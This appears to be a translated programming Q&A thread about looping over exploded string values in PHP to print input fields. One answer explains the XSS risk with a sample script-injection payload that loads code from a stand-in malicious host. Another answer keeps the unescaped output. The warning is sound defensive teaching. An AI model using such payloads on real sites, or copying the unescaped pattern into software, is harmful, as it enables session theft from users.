PHP中从字符串到循环[关闭]

Question

我有一个从数据库中提取的字符串，其中每个值都由“-”分隔，如下所示：a-b-c。 在我的数据库中，我还有一个字段告诉我我有多少个值，在本例中为 3。 我需要为字符串的每个值创建一个文本文件，所以我正在考虑做这样的事情：

$numberOfValues=db=>n;
$string=bb=>string;
$singleValue = explode("-", $string);
for($i=0;$i<$numberOfValues;$i++): {
echo ('input type="text" value="'.$singleValue[$i].'">');
}

我的问题基本上是：这是一种有效的方式来做我正在寻找的事情吗？或者也许有一个“更好”的方法？ 谢谢！

Answer 1

除了提到的foreach和valid input标签，

• 您不应该像以前那样将 HTML 与 PHP 逻辑混为一谈。最好将 HTML 放在单独的模板中。
• 确保您在 HTML 中推送的值始终发生 HTML 转义，除非另有明确说明，以便字符 "、'、<、> 正确转义并且您不会离开XSS 漏洞。

---

在 XSS 上，您的代码中的示例：

echo ('input type="text" value="'.$singleValue[$i].'">');

现在，如果我们假设用户可以影响$singleValue[$i] 的内容，他们可以在那里推送类似"><script src="http://malicioussite.com/hacking.js"></script><span id=" 的内容

这将使生成的 HTML 出现在页面上

input type="text" value=""><script src="http://malicioussite.com/hacking.js"></script><span id="">

这将强制最终用户浏览器执行“hacking.js”文件，例如，该文件可以窃取您的会话信息并将其提交到任何域。通过转义一些已知的危险字符，您可以最轻松地防范此类威胁，这就是 htmlspecialchars() 函数的用途。

• Wikipedia article on XSS

Answer 2

$values = explode('-', $string);

foreach ($values as $value) {
    printf('<input type="text" value="%s">', htmlspecialchars($value));
}

Answer 3

没关系。但是打开和关闭输入标签:)

echo ('<input type="text" value="'.$singleValue[$i].'"/>');